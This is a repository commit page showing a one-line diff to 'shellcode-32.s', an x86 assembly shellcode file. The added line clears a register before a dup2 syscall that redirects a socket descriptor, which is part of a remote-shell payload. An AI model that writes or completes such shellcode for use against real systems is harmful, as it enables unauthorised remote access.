aboutsummaryrefslogtreecommitdiffstats
path: root/shellcode-32.s
diff options
context:
space:
mode:
Diffstat (limited to 'shellcode-32.s')
-rw-r--r--shellcode-32.s1
1 files changed, 1 insertions, 0 deletions
diff --git a/shellcode-32.s b/shellcode-32.s
index d08b93f..bb29701 100644
--- a/shellcode-32.s
+++ b/shellcode-32.s
@@ -14,6 +14,7 @@ xor ebx,ebx
mov al,0x2e
int 0x80
;dup2(6, 2)
+xor ecx,ecx
mov bl,0x6
mov cl,0x2
mov al,0x3f